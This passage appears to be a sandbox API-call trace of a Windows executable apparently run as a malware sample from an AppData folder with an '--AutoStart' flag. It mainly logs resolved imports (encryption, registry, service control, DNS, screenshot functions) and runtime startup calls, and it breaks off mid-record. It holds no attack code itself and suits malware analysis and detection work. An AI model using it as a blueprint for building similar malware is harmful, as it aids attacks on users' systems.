0x75d310ff [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="CopyFileW") returned 0x75d5830d [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="FormatMessageW") returned 0x75d34620 [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="lstrcpynW") returned 0x75d5d556 [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="CreateProcessA") returned 0x75d31072 [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="TerminateProcess") returned 0x75d4d802 [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="ReadFile") returned 0x75d33ed3 [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="CreateFileW") returned 0x75d33f5c [0129.802] GetProcAddress (hModule=0x75d20000, lpProcName="lstrcatA") returned 0x75d52b7a [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="GetEnvironmentVariableA") returned 0x75d333a0 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="lstrcmpW") returned 0x75d35929 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="MultiByteToWideChar") returned 0x75d3192e [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="lstrlenW") returned 0x75d31700 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="FlushFileBuffers") returned 0x75d3469b [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="GetShortPathNameA") returned 0x75d5594d [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="GetFileSizeEx") returned 0x75d359e2 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="GetLastError") returned 0x75d311c0 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="SetLastError") returned 0x75d311a9 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="GetProcAddress") returned 0x75d31222 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="VirtualAlloc") returned 0x75d31856 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="MoveFileW") returned 0x75d49af0 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="FindClose") returned 0x75d34442 [0129.803] GetProcAddress (hModule=0x75d20000, lpProcName="Process32FirstW") returned 0x75d58baf [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="LocalAlloc") returned 0x75d3168c [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="CreateEventW") returned 0x75d3183e [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="GetModuleFileNameA") returned 0x75d314b1 [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="Process32NextW") returned 0x75d5896c [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="lstrcatW") returned 0x75d5828e [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="CreateMutexA") returned 0x75d34c6b [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="FindNextFileW") returned 0x75d354ee [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="CreateToolhelp32Snapshot") returned 0x75d5735f [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="SetEnvironmentVariableA") returned 0x75d3e331 [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="DeleteFileW") returned 0x75d389b3 [0129.804] GetProcAddress (hModule=0x75d20000, lpProcName="LocalFree") returned 0x75d32d3c [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="lstrcpyW") returned 0x75d53102 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="DeleteFileA") returned 0x75d35444 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="lstrcpyA") returned 0x75d52a9d [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="SetPriorityClass") returned 0x75d4cf28 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentProcess") returned 0x75d31809 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="GetComputerNameW") returned 0x75d3dd0e [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="GetLogicalDrives") returned 0x75d35371 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="GetModuleFileNameW") returned 0x75d34950 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="SetStdHandle") returned 0x75db454f [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="GetVersion") returned 0x75d34467 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="CreateDirectoryA") returned 0x75d5d526 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="CreateThread") returned 0x75d334d5 [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="CompareStringW") returned 0x75d33bca [0129.805] GetProcAddress (hModule=0x75d20000, lpProcName="GetTimeFormatW") returned 0x75d4f481 [0129.806] GetProcAddress (hModule=0x75d20000, lpProcName="GetDateFormatW") returned 0x75d534d7 [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="EnumSystemLocalesW") returned 0x75db425f [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="GetUserDefaultLCID") returned 0x75d33da5 [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="IsValidLocale") returned 0x75d4ce46 [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="GetLocaleInfoW") returned 0x75d33c42 [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="CreateSemaphoreW") returned 0x75d4ca5a [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="GetModuleHandleW") returned 0x75d334b0 [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="GetTickCount") returned 0x75d3110c [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="TlsFree") returned 0x75d33587 [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="TlsSetValue") returned 0x75d314fb [0129.811] GetProcAddress (hModule=0x75d20000, lpProcName="TlsGetValue") returned 0x75d311e0 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="TlsAlloc") returned 0x75d349ad [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75d31916 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="SetUnhandledExceptionFilter") returned 0x75d387c9 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="UnhandledExceptionFilter") returned 0x75d5772f [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="GetModuleHandleA") returned 0x75d31245 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="GetVersionExA") returned 0x75d33519 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="GlobalMemoryStatus") returned 0x75d38b6d [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="LoadLibraryA") returned 0x75d349d7 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="FlushConsoleInputBuffer") returned 0x75dd7a9f [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="WaitForSingleObject") returned 0x75d31136 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="CreateDirectoryW") returned 0x75d34259 [0129.812] GetProcAddress (hModule=0x75d20000, lpProcName="SetFilePointerEx") returned 0x75d4c807 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="CreateProcessW") returned 0x75d3103d [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="FreeLibrary") returned 0x75d334c8 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="SetErrorMode") returned 0x75d31b00 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="lstrlenA") returned 0x75d35a4b [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="SetFilePointer") returned 0x75d317d1 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="FindFirstFileW") returned 0x75d34435 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="SetConsoleMode") returned 0x75d4a77d [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="CreateFileA") returned 0x75d353c6 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="GetCommandLineW") returned 0x75d35223 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x75dd793f [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="PeekConsoleInputA") returned 0x75dd6f0d [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="FreeEnvironmentStringsW") returned 0x75d351cb [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="GetEnvironmentStringsW") returned 0x75d351e3 [0129.813] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentProcessId") returned 0x75d311f8 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="QueryPerformanceCounter") returned 0x75d31725 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="GetTimeZoneInformation") returned 0x75d3465a [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="RaiseException") returned 0x75d358a6 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="GetStringTypeW") returned 0x75d31946 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="GetConsoleCP") returned 0x75dd7bff [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="ReadConsoleW") returned 0x75dd739a [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="GetConsoleMode") returned 0x75d31328 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="HeapSize") returned 0x77d93002 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="LoadLibraryExW") returned 0x75d3495d [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="OutputDebugStringW") returned 0x75d5d1d4 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="SetConsoleCtrlHandler") returned 0x75d38a09 [0129.814] GetProcAddress (hModule=0x75d20000, lpProcName="RtlUnwind") returned 0x75d5d1c3 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="FatalAppExitA") returned 0x75db4691 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="GetStartupInfoW") returned 0x75d34d40 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="GetExitCodeProcess") returned 0x75d4174d [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="LCMapStringW") returned 0x75d317b9 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="DeleteCriticalSection") returned 0x77d945f5 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="AreFileApisANSI") returned 0x75db40d1 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="ExitProcess") returned 0x75d37a10 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="GetProcessHeap") returned 0x75d314e9 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="HeapReAlloc") returned 0x77da1f6e [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="GlobalFree") returned 0x75d35558 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="SetEndOfFile") returned 0x75d4ce2e [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="ReadConsoleInputA") returned 0x75dd6f53 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="CloseHandle") returned 0x75d31410 [0129.815] GetProcAddress (hModule=0x75d20000, lpProcName="HeapFree") returned 0x75d314c9 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="HeapAlloc") returned 0x77d8e026 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="EnterCriticalSection") returned 0x77d822b0 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="LeaveCriticalSection") returned 0x77d82270 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="GetStdHandle") returned 0x75d351b3 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="GetFileType") returned 0x75d33531 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="GetModuleHandleExW") returned 0x75d34a6f [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="WriteConsoleW") returned 0x75d57aca [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="EncodePointer") returned 0x77da0fcb [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="DecodePointer") returned 0x77d99d35 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="GetSystemTimeAsFileTime") returned 0x75d33509 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="IsDebuggerPresent") returned 0x75d34a5d [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="IsProcessorFeaturePresent") returned 0x75d35235 [0129.816] GetProcAddress (hModule=0x75d20000, lpProcName="IsValidCodePage") returned 0x75d34493 [0129.817] GetProcAddress (hModule=0x75d20000, lpProcName="GetACP") returned 0x75d3179c [0129.817] GetProcAddress (hModule=0x75d20000, lpProcName="GetOEMCP") returned 0x75d5d1a1 [0129.817] GetProcAddress (hModule=0x75d20000, lpProcName="GetCPInfo") returned 0x75d35189 [0129.817] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentThread") returned 0x75d317ec [0129.817] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentThreadId") returned 0x75d31450 [0129.817] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773f0000 [0129.817] GetProcAddress (hModule=0x773f0000, lpProcName="PeekMessageW") returned 0x774105ba [0129.817] GetProcAddress (hModule=0x773f0000, lpProcName="PostThreadMessageW") returned 0x77408bff [0129.817] GetProcAddress (hModule=0x773f0000, lpProcName="DefWindowProcW") returned 0x77d925dd [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="DispatchMessageW") returned 0x7740787b [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="UpdateWindow") returned 0x77413559 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="CreateWindowExW") returned 0x77408a29 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="LoadCursorW") returned 0x774088f7 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="IsWindow") returned 0x77407136 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="ShowWindow") returned 0x77410dfb [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="RegisterClassExW") returned 0x7740b17d [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="PostQuitMessage") returned 0x77409abb [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="GetMessageW") returned 0x774078e2 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="DestroyWindow") returned 0x77409a55 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="SendMessageW") returned 0x77409679 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="GetProcessWindowStation") returned 0x77409eea [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="GetUserObjectInformationW") returned 0x77408068 [0129.818] GetProcAddress (hModule=0x773f0000, lpProcName="MessageBoxA") returned 0x7745fd1e [0129.819] GetProcAddress (hModule=0x773f0000, lpProcName="GetDesktopWindow") returned 0x77410a19 [0129.819] GetProcAddress (hModule=0x773f0000, lpProcName="MessageBoxW") returned 0x7745fd3f [0129.819] GetProcAddress (hModule=0x773f0000, lpProcName="TranslateMessage") returned 0x77407809 [0129.819] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77010000 [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="RegCloseKey") returned 0x7702469d [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="CloseServiceHandle") returned 0x7702369c [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="GetUserNameW") returned 0x7702157a [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="ReportEventA") returned 0x77013ee9 [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="RegisterEventSourceA") returned 0x77022d46 [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="DeregisterEventSource") returned 0x770235dd [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="CryptHashData") returned 0x7701df36 [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="RegSetValueExW") returned 0x770214d6 [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="CryptDestroyHash") returned 0x7701df66 [0129.819] GetProcAddress (hModule=0x77010000, lpProcName="ControlService") returned 0x77037144 [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="RegOpenKeyExW") returned 0x7702468d [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="CryptCreateHash") returned 0x7701df4e [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="CryptEncrypt") returned 0x7703779b [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="CryptImportKey") returned 0x7701c532 [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="QueryServiceStatus") returned 0x77022a86 [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="RegQueryValueExW") returned 0x770246ad [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="CryptReleaseContext") returned 0x7701e124 [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="OpenServiceW") returned 0x7701ca4c [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="OpenSCManagerW") returned 0x7701ca64 [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="CryptAcquireContextW") returned 0x7701df14 [0129.820] GetProcAddress (hModule=0x77010000, lpProcName="CryptGetHashParam") returned 0x7701df7e [0129.820] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75f80000 [0129.825] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetPathFromIDListW") returned 0x760117bf [0129.825] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetSpecialFolderLocation") returned 0x7600e141 [0129.825] GetProcAddress (hModule=0x75f80000, lpProcName="ShellExecuteA") returned 0x761c7078 [0129.825] GetProcAddress (hModule=0x75f80000, lpProcName="ShellExecuteExW") returned 0x75fa1e46 [0129.825] GetProcAddress (hModule=0x75f80000, lpProcName="CommandLineToArgvW") returned 0x75f99ee8 [0129.825] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathA") returned 0x76097804 [0129.825] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x774f0000 [0129.825] GetProcAddress (hModule=0x774f0000, lpProcName="CoInitialize") returned 0x7750b636 [0129.825] GetProcAddress (hModule=0x774f0000, lpProcName="CoInitializeSecurity") returned 0x77517259 [0129.826] GetProcAddress (hModule=0x774f0000, lpProcName="CoUninitialize") returned 0x775386d3 [0129.826] GetProcAddress (hModule=0x774f0000, lpProcName="CoCreateInstance") returned 0x77539d0b [0129.826] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x77650000 [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0x6) returned 0x77653e59 [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0x8) returned 0x77653ed5 [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0x9) returned 0x77653eae [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0xc8) returned 0x77653f21 [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0xca) returned 0x7765fd6b [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0xc9) returned 0x77654af8 [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0xc) returned 0x77655dee [0129.826] GetProcAddress (hModule=0x77650000, lpProcName=0x2) returned 0x77654642 [0129.826] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75570000 [0130.119] GetProcAddress (hModule=0x75570000, lpProcName="GetAdaptersInfo") returned 0x75579263 [0130.119] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x778c0000 [0130.148] GetProcAddress (hModule=0x778c0000, lpProcName=0xc) returned 0x778cb131 [0130.148] GetProcAddress (hModule=0x778c0000, lpProcName=0xb) returned 0x778c311b [0130.148] GetProcAddress (hModule=0x778c0000, lpProcName=0x34) returned 0x778d7673 [0130.148] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75510000 [0130.241] GetProcAddress (hModule=0x75510000, lpProcName="DnsFree") returned 0x7551436b [0130.241] GetProcAddress (hModule=0x75510000, lpProcName="DnsQuery_W") returned 0x7552572c [0130.241] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75920000 [0130.241] GetProcAddress (hModule=0x75920000, lpProcName="CryptStringToBinaryA") returned 0x75955d77 [0130.241] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76ef0000 [0130.241] GetProcAddress (hModule=0x76ef0000, lpProcName="DeleteObject") returned 0x76f05689 [0130.241] GetProcAddress (hModule=0x76ef0000, lpProcName="GetObjectA") returned 0x76f085d4 [0130.241] GetProcAddress (hModule=0x76ef0000, lpProcName="SelectObject") returned 0x76f04f70 [0130.241] GetProcAddress (hModule=0x76ef0000, lpProcName="GetDeviceCaps") returned 0x76f04de0 [0130.241] GetProcAddress (hModule=0x76ef0000, lpProcName="GetBitmapBits") returned 0x76f0c155 [0130.241] GetProcAddress (hModule=0x76ef0000, lpProcName="BitBlt") returned 0x76f05ea6 [0130.242] GetProcAddress (hModule=0x76ef0000, lpProcName="DeleteDC") returned 0x76f058b3 [0130.242] GetProcAddress (hModule=0x76ef0000, lpProcName="CreateDCA") returned 0x76f07bcc [0130.242] GetProcAddress (hModule=0x76ef0000, lpProcName="CreateCompatibleDC") returned 0x76f054f4 [0130.242] GetProcAddress (hModule=0x76ef0000, lpProcName="CreateCompatibleBitmap") returned 0x76f05f49 [0130.242] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x75450000 [0130.669] GetProcAddress (hModule=0x75450000, lpProcName="atexit") returned 0x7546c544 [0130.669] atexit (param_1=0x5b0920) returned 0 [0130.685] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18eda8 | out: lpSystemTimeAsFileTime=0x18eda8*(dwLowDateTime=0x51f60f90, dwHighDateTime=0x1d5956a)) [0130.685] GetCurrentThreadId () returned 0x4d8 [0130.685] GetCurrentProcessId () returned 0x4d4 [0130.685] QueryPerformanceCounter (in: lpPerformanceCount=0x18eda0 | out: lpPerformanceCount=0x18eda0*=6985340911) returned 1 [0130.738] GetStartupInfoW (in: lpStartupInfo=0x18ed38 | out: lpStartupInfo=0x18ed38*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x75d33519, hStdOutput=0x77d7fd35, hStdError=0x77de7daf)) [0130.749] GetProcessHeap () returned 0x6e0000 [0130.896] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75d20000 [0130.896] GetProcAddress (hModule=0x75d20000, lpProcName="FlsAlloc") returned 0x75d34f2b [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="FlsFree") returned 0x75d3359f [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="FlsGetValue") returned 0x75d31252 [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="FlsSetValue") returned 0x75d34208 [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="InitializeCriticalSectionEx") returned 0x75d34d28 [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="CreateEventExW") returned 0x75db410b [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="CreateSemaphoreExW") returned 0x75db4195 [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="SetThreadStackGuarantee") returned 0x75d3d31f [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="CreateThreadpoolTimer") returned 0x75d4ee7e [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="SetThreadpoolTimer") returned 0x77da441c [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77dcc50e [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="CloseThreadpoolTimer") returned 0x77dcc381 [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="CreateThreadpoolWait") returned 0x75d4f088 [0130.897] GetProcAddress (hModule=0x75d20000, lpProcName="SetThreadpoolWait") returned 0x77db05d7 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="CloseThreadpoolWait") returned 0x77dcca24 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="FlushProcessWriteBuffers") returned 0x77d80b8c [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77e3fde8 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentProcessorNumber") returned 0x77dd1e1d [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="GetLogicalProcessorInformation") returned 0x75db4761 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="CreateSymbolicLinkW") returned 0x75dacd11 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="EnumSystemLocalesEx") returned 0x75db424f [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="CompareStringEx") returned 0x75db46b1 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="GetDateFormatEx") returned 0x75dc6676 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="GetLocaleInfoEx") returned 0x75db4751 [0130.898] GetProcAddress (hModule=0x75d20000, lpProcName="GetTimeFormatEx") returned 0x75dc65f1 [0130.899] GetProcAddress (hModule=0x75d20000, lpProcName="GetUserDefaultLocaleName") returned 0x75db47c1 [0130.899] GetProcAddress (hModule=0x75d20000, lpProcName="IsValidLocaleName") returned 0x75db47e1 [0130.899] GetProcAddress (hModule=0x75d20000, lpProcName="LCMapStringEx") returned 0x75db47f1 [0130.899] GetProcAddress (hModule=0x75d20000, lpProcName="GetCurrentPackageId") returned 0x0 [0130.899] GetProcAddress (hModule=0x75d20000, lpProcName="GetTickCount64") returned 0x75d4eee0 [0130.899] GetProcAddress (hModule=0x75d20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0130.899] GetProcAddress (hModule=0x75d20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0130.900] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3bc) returned 0x701808 [0130.900] GetCurrentThreadId () returned 0x4d8 [0130.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x6f7af8 [0130.905] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x800) returned 0x701bd0 [0130.906] GetStartupInfoW (in: lpStartupInfo=0x18ed08 | out: lpStartupInfo=0x18ed08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xf0784dc4, hStdError=0x58)) [0130.906] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0130.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0130.906] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0130.906] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart" [0130.906] GetEnvironmentStringsW () returned 0x7023d8* [0130.906] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xb02) returned 0x702ee8 [0130.963] FreeEnvironmentStringsW (penv=0x7023d8) returned 1 [0130.969] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x76 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x112) returned 0x7039f8 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x9c) returned 0x703b18 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3e) returned 0x6f6ab8 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x6c) returned 0x703bc0 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x6e) returned 0x703c38 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x78) returned 0x6f4d08 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x62) returned 0x703cb0 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2e) returned 0x6fd5e0 [0130.969] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x48) returned 0x6f92c8 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x28) returned 0x6fcf50 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1a) returned 0x7014a0 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x4a) returned 0x703d20 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, 